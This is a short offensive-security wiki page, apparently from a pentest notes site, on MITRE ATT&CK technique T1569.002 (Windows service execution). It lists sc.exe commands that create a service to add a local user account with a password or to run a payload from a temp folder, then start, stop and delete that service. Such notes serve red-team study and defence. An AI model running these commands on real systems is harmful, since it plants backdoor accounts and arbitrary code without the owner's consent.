MITRE ATT&CK™ System Services - Service Execution - Technique T1569.002
Last updated
Was this helpful?
Theory
Windows services can also be leveraged to run arbitrary commands since they execute a command when started.
Practice
On windows, we can use the built in sc.exe binary to remotely interact with services
#Create a service
sc.exe create MyService binPath= "net user munra Pass123 /add" start= auto
sc.exe create MyService binPath= "C:\Windows\TEMP\payload.exe" start= auto
#Start a service
sc.exe start MyService
#Stop and delete a remote service
sc.exe stop MyService
sc.exe delete MyService
You may want to check this page for remote services execution :
